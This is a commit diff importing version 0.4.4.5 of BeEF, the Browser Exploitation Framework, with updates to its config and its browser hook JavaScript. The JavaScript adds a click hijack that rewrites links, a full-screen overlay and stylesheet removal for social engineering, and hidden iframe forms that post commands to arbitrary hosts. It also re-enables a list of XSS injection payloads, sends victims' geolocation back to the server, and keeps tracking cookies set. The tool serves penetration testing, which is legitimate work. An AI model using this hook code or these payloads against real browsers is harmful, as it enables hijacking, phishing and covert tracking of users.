Commit f598c8ea authored by Raphaël Hertzog's avatar Raphaël Hertzog

Imported Upstream version 0.4.4.5

parent e014389e
beef.db
test/msf-test
custom-config.yaml
\ No newline at end of file
custom-config.yaml
.DS_Store
.gitignore
.rvmrc
*.lock
......@@ -9,13 +9,12 @@
# Gems only required on Windows, or with specific Windows issues
if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
gem "win32console"
gem "eventmachine", "1.0.0.beta.4.1"
else
gem "eventmachine", "0.12.10"
end
gem "eventmachine", "1.0.3"
gem "thin"
gem "sinatra", "1.3.2"
gem "sinatra", "1.4.2"
gem "rack", "1.5.2"
gem "em-websocket", "~> 0.3.6"
gem "jsmin", "~> 1.0.1"
gem "ansi"
......
......@@ -76,10 +76,10 @@ end
@beef_process_id = nil;
task :beef_start => 'beef' do
printf "Starting BeEF (wait 10 seconds)..."
printf "Starting BeEF (wait a few seconds)..."
@beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
delays.each do |i| # delay for 10 seconds
delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
delays.each do |i| # delay for a few seconds
printf '.'
sleep (i)
end
......
......@@ -4,4 +4,4 @@
# See the file 'doc/COPYING' for copying permission
#
0.4.4.1-alpha
0.4.4.5-alpha
......@@ -75,6 +75,7 @@ case config.get("beef.database.driver")
DataMapper.setup(:default,
:adapter => config.get("beef.database.driver"),
:host => config.get("beef.database.db_host"),
:port => config.get("beef.database.db_port"),
:username => config.get("beef.database.db_user"),
:password => config.get("beef.database.db_passwd"),
:database => config.get("beef.database.db_name"),
......
......@@ -6,7 +6,7 @@
# BeEF Configuration file
beef:
version: '0.4.4.1-alpha'
version: '0.4.4.5-alpha'
debug: false
restrictions:
......@@ -27,12 +27,20 @@ beef:
# if running behind a nat set the public ip address here
#public: ""
#public_port: "" # port setting is experimental
dns: "localhost"
# DNS
dns_host: "localhost"
dns_port: 53
panel_path: "/ui/panel"
hook_file: "/hook.js"
hook_session_name: "BEEFHOOK"
session_cookie_name: "BEEFSESSION"
# Allow one or multiple domains to access the RESTful API using CORS
# For multiple domains use: "http://browserhacker.com, http://domain2.com"
restful_api:
allow_cors: false
cors_allowed_domains: "http://browserhacker.com"
# Prefer WebSockets over XHR-polling when possible.
websocket:
enable: false
......@@ -43,14 +51,14 @@ beef:
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
enable: false
enable: true
type: "apache" #supported: apache, iis
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
https:
enable: false
# In production environments, be sure to use a valid certificate signed for the value
# used in beef.http.dns (the domain name of the server where you run BeEF)
# used in beef.http.dns_host (the domain name of the server where you run BeEF)
key: "beef_key.pem"
cert: "beef_cert.pem"
......@@ -72,6 +80,7 @@ beef:
# db connection information is only used for mysql/postgres
db_host: "localhost"
db_port: 5432
db_name: "beef"
db_user: "beef"
db_passwd: "beef123"
......@@ -91,6 +100,10 @@ beef:
crypto_default_value_length: 80
# Enable client-side debugging
client:
debug: false
# You may override default extension configuration parameters here
extension:
requester:
......
......@@ -25,6 +25,7 @@ require 'core/main/handlers/browserdetails'
# @note Include the network stack
require 'core/main/network_stack/handlers/dynamicreconstruction'
require 'core/main/network_stack/handlers/redirector'
require 'core/main/network_stack/handlers/raw'
require 'core/main/network_stack/assethandler'
require 'core/main/network_stack/api'
......
......@@ -31,7 +31,21 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
// An array containing all the BeEF JS components.
components: new Array(),
/**
* Adds a function to display debug messages (wraps console.log())
* @param: {string} the debug string to return
*/
debug: function(msg) {
if (!<%= @client_debug %>) return;
if (typeof console == "object" && typeof console.log == "function") {
console.log(msg);
} else {
// TODO: maybe add a callback to BeEF server for debugging purposes
//window.alert(msg);
}
},
/**
* Adds a function to execute.
* @param: {Function} the function to execute.
......
This source diff could not be displayed because it is too large. You can view the blob instead.
......@@ -76,6 +76,30 @@ beef.dom = {
return iframe;
},
/**
* Returns the highest current z-index
* @param: {Boolean} whether to return an associative array with the height AND the ID of the element
* @return: {Integer} Highest z-index in the DOM
* OR
* @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
*/
getHighestZindex: function(include_id) {
var highest = {'height':0, 'elem':''};
$j('*').each(function() {
var current_high = parseInt($j(this).css("zIndex"),10);
if (current_high > highest.height) {
highest.height = current_high;
highest.elem = $j(this).attr('id');
}
});
if (include_id) {
return highest;
} else {
return highest.height;
}
},
/**
* Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
......@@ -95,8 +119,15 @@ beef.dom = {
var form_action = params['src'];
params['src'] = '';
}
if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); }
if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
if (type == 'hidden') {
css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
} else if (type == 'fullscreen') {
css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
$j('body').css({'padding':'0px', 'margin':'0px'});
} else {
css = styles;
$j('body').css({'padding':'0px', 'margin':'0px'});
}
var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
if (form_submit && form_action)
......@@ -127,6 +158,75 @@ beef.dom = {
}
});
},
/**
* Load a full screen div that is black, or, transparent
* @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
* @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
* opacity:0-100 // Lower number = less grayout higher = more of a blackout
* // By default this is 70
* zindex: # // HTML elements with a higher zindex appear on top of the gray out
* // By default this will use beef.dom.getHighestZindex to always go to the top
* bgcolor: (#xxxxxx) // Standard RGB Hex color code
* // By default this is #000000
*/
grayOut: function(vis, options) {
// in any order. Pass only the properties you need to set.
var options = options || {};
var zindex = options.zindex || beef.dom.getHighestZindex()+1;
var opacity = options.opacity || 70;
var opaque = (opacity / 100);
var bgcolor = options.bgcolor || '#000000';
var dark=document.getElementById('darkenScreenObject');
if (!dark) {
// The dark layer doesn't exist, it's never been created. So we'll
// create it here and apply some basic styles.
// If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
var tbody = document.getElementsByTagName("body")[0];
var tnode = document.createElement('div'); // Create the layer.
tnode.style.position='absolute'; // Position absolutely
tnode.style.top='0px'; // In the top
tnode.style.left='0px'; // Left corner of the page
tnode.style.overflow='hidden'; // Try to avoid making scroll bars
tnode.style.display='none'; // Start out Hidden
tnode.id='darkenScreenObject'; // Name it so we can find it later
tbody.appendChild(tnode); // Add it to the web page
dark=document.getElementById('darkenScreenObject'); // Get the object.
}
if (vis) {
// Calculate the page width and height
if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
var pageWidth = document.body.scrollWidth+'px';
var pageHeight = document.body.scrollHeight+'px';
} else if( document.body.offsetWidth ) {
var pageWidth = document.body.offsetWidth+'px';
var pageHeight = document.body.offsetHeight+'px';
} else {
var pageWidth='100%';
var pageHeight='100%';
}
//set the shader to cover the entire page and make it visible.
dark.style.opacity=opaque;
dark.style.MozOpacity=opaque;
dark.style.filter='alpha(opacity='+opacity+')';
dark.style.zIndex=zindex;
dark.style.backgroundColor=bgcolor;
dark.style.width= pageWidth;
dark.style.height= pageHeight;
dark.style.display='block';
} else {
dark.style.display='none';
}
},
/**
* Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
* or, re-writing a document this is useful.
*/
removeStylesheets: function() {
$j('link[rel=stylesheet]').remove();
$j('style').remove();
},
/**
* Create a form element with the specified parameters, appending it to the DOM if append == true
......@@ -178,6 +278,23 @@ beef.dom = {
}).length;
},
/**
* Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
* http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html
* @param: {String} url: the url to be rewritten
* @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return: {Number} the amount of links found in the DOM and rewritten.
*/
rewriteLinksClickEvents: function(url, selector) {
var sel = (selector == null) ? 'a' : selector;
return $j(sel).each(function() {
if ($j(this).attr('href') != null)
{
$j(this).click(function() {this.href=url});
}
}).length;
},
/**
* Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)
* @param: {String} old_protocol: the old link protocol to be rewritten
......@@ -275,7 +392,7 @@ beef.dom = {
}
content += "</object>";
}
if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) {
if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
if (codebase != null) {
content = "" +
......@@ -294,24 +411,25 @@ beef.dom = {
}
content += "</applet>";
}
if (beef.browser.isFF()) {
if (codebase != null) {
content = "" +
"<embed id='" + id + "' code='" + code + "' " +
"type='application/x-java-applet' codebase='" + codebase + "' " +
"height='0' width='0' name='" + name + "'>";
} else {
content = "" +
"<embed id='" + id + "' code='" + code + "' " +
"type='application/x-java-applet' archive='" + archive + "' " +
"height='0' width='0' name='" + name + "'>";
}
if (params != null) {
content += beef.dom.parseAppletParams(params);
}
content += "</embed>";
}
// For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
// if (beef.browser.isFF()) {
// if (codebase != null) {
// content = "" +
// "<embed id='" + id + "' code='" + code + "' " +
// "type='application/x-java-applet' codebase='" + codebase + "' " +
// "height='0' width='0' name='" + name + "'>";
// } else {
// content = "" +
// "<embed id='" + id + "' code='" + code + "' " +
// "type='application/x-java-applet' archive='" + archive + "' " +
// "height='0' width='0' name='" + name + "'>";
// }
//
// if (params != null) {
// content += beef.dom.parseAppletParams(params);
// }
// content += "</embed>";
// }
$j('body').append(content);
},
......@@ -358,11 +476,11 @@ beef.dom = {
* @params: {String} rport: remote port
* @params: {String} commands: protocol commands to be executed by the remote host:port service
*/
createIframeIpecForm: function(rhost, rport, commands){
createIframeIpecForm: function(rhost, rport, path, commands){
var iframeIpec = beef.dom.createInvisibleIframe();
var formIpec = document.createElement('form');
formIpec.setAttribute('action', 'http://'+rhost+':'+rport+'/index.html');
formIpec.setAttribute('action', 'http://'+rhost+':'+rport+path);
formIpec.setAttribute('method', 'POST');
formIpec.setAttribute('enctype', 'multipart/form-data');
......
......@@ -32,14 +32,14 @@ beef.geolocation = {
$j.ajax({
error: function(xhr, status, error){
//console.log("[geolocation.js] openstreetmap error");
beef.debug("[geolocation.js] openstreetmap error");
beef.net.send(command_url, command_id, "latitude=" + latitude
+ "&longitude=" + longitude
+ "&osm=UNAVAILABLE"
+ "&geoLocEnabled=True");
},
success: function(data, status, xhr){
//console.log("[geolocation.js] openstreetmap success");
beef.debug("[geolocation.js] openstreetmap success");
var jsonResp = $j.parseJSON(data);
beef.net.send(command_url, command_id, "latitude=" + latitude
......@@ -64,16 +64,16 @@ beef.geolocation = {
beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");
return;
}
//console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
navigator.geolocation.getCurrentPosition( //note: this is an async call
function(position){ // success
var latitude = position.coords.latitude;
var longitude = position.coords.longitude;
//console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
}, function(error){ // failure
//console.log("[geolocation.js] error [%d] getting position", error.code);
beef.debug("[geolocation.js] error [%d] getting position", error.code);
switch(error.code) // Returns 0-3
{
case 0:
......
......@@ -8,6 +8,42 @@ beef.hardware = {
ua: navigator.userAgent,
cpuType: function() {
// IE
if (typeof navigator.cpuClass != 'undefined') {
cpu = navigator.cpuClass;
if (cpu == "x86") return "32-bit";
if (cpu == "68K") return "Motorola 68K";
if (cpu == "PPC") return "Motorola PPC";
if (cpu == "Alpha") return "Digital";
if (this.ua.match('Win64; IA64')) return "64-bit (Intel)";
if (this.ua.match('Win64; x64')) return "64-bit (AMD)";
// Firefox
} else if (typeof navigator.oscpu != 'undefined') {
if (navigator.oscpu.match('(WOW64|x64|x86_64)')) return "64-bit";
}
if (navigator.platform.toLowerCase() == "win64") return "64-bit";
return "32-bit";
},
isTouchEnabled: function() {
if ('ontouchstart' in document) return true;
return false;
},
isVirtualMachine: function() {
if (screen.width % 2 || screen.height % 2) return true;
return false;
},
isLaptop: function() {
// Most common laptop screen resolution
if (screen.width == 1366 && screen.height == 768) return true;
// Netbooks
if (screen.width == 1024 && screen.height == 600) return true;
return false;
},
isNokia: function() {
return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false;
},
......@@ -36,13 +72,13 @@ beef.hardware = {
* Returns true if the browser is on a Mobile Phone
* @return: {Boolean} true or false
*
* @example: if(beef.browser.isMobilePhone()) { ... }
* @example: if(beef.hardware.isMobilePhone()) { ... }
**/
isMobilePhone: function() {
return DetectMobileQuick();
},
getMobileName: function() {
getName: function() {
var ua = navigator.userAgent.toLowerCase();
if(DetectIphone()) { return "iPhone"};
if(DetectIpod()) { return "iPod Touch"};
......@@ -78,14 +114,16 @@ beef.hardware = {
if(DetectSonyMylo()) { return "Sony Mylo"};
if(DetectAmazonSilk()) { return "Kindle Fire"};
if(DetectKindle()) { return "Kindle"};
if(DetectSonyPlaystation()) { return "Playstation" };
if(DetectSonyPlaystation()) { return "Playstation"};
if(ua.search(deviceNintendoDs) > -1) { return "Nintendo DS"};
if(ua.search(deviceWii) > -1) { return "Nintendo Wii"};
if(ua.search(deviceNintendo) > -1) { return "Nintendo"};
if(DetectXbox()) { return "Xbox"};
if(this.isLaptop()) { return "Laptop"};
if(this.isVirtualMachine()) { return "Virtual Machine"};
return 'Unknown';
}
};
beef.regCmp('beef.net.hardware');
beef.regCmp('beef.hardware');
......@@ -13,7 +13,8 @@
* and will have a new session id. The new session id will need to know
* the brwoser details. So sendback the browser details again.
*/
BEEFHOOK = beef.session.get_hook_session_id();
beef.session.get_hook_session_id();
if (beef.pageIsLoaded) {
beef.net.browser_details();
......@@ -31,7 +32,7 @@ window.onpopstate = function (event) {
try {
callback(event);
} catch (e) {
console.log("window.onpopstate - couldn't execute callback: " + e.message);
beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
}
return false;
}
......@@ -46,7 +47,7 @@ window.onclose = function (event) {
try {
callback(event);
} catch (e) {
console.log("window.onclose - couldn't execute callback: " + e.message);
beef.debug("window.onclose - couldn't execute callback: " + e.message);
}
return false;
}
......
......@@ -793,14 +793,19 @@ this.waitForSwf = function(i)
this.evercookie_cookie = function(name, value)
{
if (typeof(value) != "undefined")
{
// expire the cookie first
document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
}
else
return this.getFromStr(name, document.cookie);
try{
if (typeof(value) != "undefined")
{
// expire the cookie first
document.cookie = name + '=; expires=Mon, 20 Sep 2010 00:00:00 UTC; path=/';
document.cookie = name + '=' + value + '; expires=Tue, 31 Dec 2030 00:00:00 UTC; path=/';
}
else
return this.getFromStr(name, document.cookie);
}catch(e){
// the hooked domain is using HttpOnly, so we must set the hook ID in a different way.
// evercookie_userdata and evercookie_window will be used in this case.
}
};
// get value from param-like string (eg, "x=y&name=VALUE")
......
......@@ -50,6 +50,7 @@ beef.logger = {
*/
start: function() {
beef.browser.hookChildFrames();
this.running = true;
var d = new Date();
this.time = d.getTime();
......
......@@ -43,7 +43,7 @@ beef.net.dns = {
// sends a DNS request
sendQuery = function(query) {
//console.log("Requesting: "+query);
beef.debug("Requesting: "+query);
var img = new Image;
img.src = "http://"+query;
img.onload = function() { dom.removeChild(this); }
......
......@@ -49,22 +49,20 @@ beef.net.xssrays = {
//browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
vectors: [
// {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
// {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
{input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
{input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
// {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
// {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
// {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
{input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
{input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
{input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
{input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
{input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
{input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
......@@ -107,7 +105,7 @@ beef.net.xssrays = {
// util function. Print string to the console only if the debug flag is on and the browser is not IE.
printDebug:function(log) {
if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
console.log("[XssRays] " + log);
beef.debug("[XssRays] " + log);
}
},